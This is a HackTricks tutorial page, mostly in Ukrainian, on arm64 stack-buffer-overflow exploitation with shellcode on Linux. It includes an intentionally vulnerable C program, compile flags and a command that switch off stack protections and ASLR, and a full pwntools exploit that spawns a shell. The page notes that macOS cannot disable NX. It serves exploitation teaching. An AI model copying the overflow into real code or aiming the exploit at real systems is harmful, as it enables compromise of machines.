HackTricksStack Shellcode - arm64
Reading time: 3 minutes
tip
Вивчайте та практикуйте AWS Hacking:
HackTricks Training AWS Red Team Expert (ARTE)
Вивчайте та практикуйте GCP Hacking: 
HackTricks Training GCP Red Team Expert (GRTE)
Вивчайте та практикуйте Azure Hacking: 
HackTricks Training Azure Red Team Expert (AzRTE)
Підтримайте HackTricks
- Перевірте плани підписки!
- Приєднуйтесь до 💬 групи Discord або групи telegram або слідкуйте за нами в Twitter 🐦 @hacktricks_live.
- Діліться хакерськими трюками, надсилаючи PR до HackTricks та HackTricks Cloud репозиторіїв на github.
Знайдіть вступ до arm64 у:
Linux
Код
#include <stdio.h>
#include <unistd.h>
void vulnerable_function() {
char buffer[64];
read(STDIN_FILENO, buffer, 256); // <-- bof vulnerability
}
int main() {
vulnerable_function();
return 0;
}
Скомпілюйте без pie, canary і nx:
clang -o bof bof.c -fno-stack-protector -Wno-format-security -no-pie -z execstack
Без ASLR і без canary - Stack Overflow
Щоб вимкнути ASLR, виконайте:
echo 0 | sudo tee /proc/sys/kernel/randomize_va_space
Щоб отримати offset of the bof check this link.
Exploit:
from pwn import *
# Load the binary
binary_name = './bof'
elf = context.binary = ELF(binary_name)
# Generate shellcode
shellcode = asm(shellcraft.sh())
# Start the process
p = process(binary_name)
# Offset to return address
offset = 72
# Address in the stack after the return address
ret_address = p64(0xfffffffff1a0)
# Craft the payload
payload = b'A' * offset + ret_address + shellcode
print("Payload length: "+ str(len(payload)))
# Send the payload
p.send(payload)
# Drop to an interactive session
p.interactive()
Єдина "складна" річ тут — знайти адресу в stack, куди викликати. У моєму випадку я згенерував exploit з адресою, знайденою за допомогою gdb, але при експлуатації він не спрацював (бо адреса stack трохи змінилась).
Я відкрив згенерований core file (gdb ./bog ./core) і перевірив реальну адресу початку shellcode.
macOS
tip
Неможливо вимкнути NX у macOS, бо на arm64 цей режим реалізований на апаратному рівні, тож його не можна відключити, тому ви не знайдете прикладів зі shellcode в stack в macOS.
Check a macOS ret2win example in:
tip
Вивчайте та практикуйте AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Вивчайте та практикуйте GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Вивчайте та практикуйте Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)
Підтримайте HackTricks
- Перевірте плани підписки!
- Приєднуйтесь до 💬 групи Discord або групи telegram або слідкуйте за нами в Twitter 🐦 @hacktricks_live.
- Діліться хакерськими трюками, надсилаючи PR до HackTricks та HackTricks Cloud репозиторіїв на github.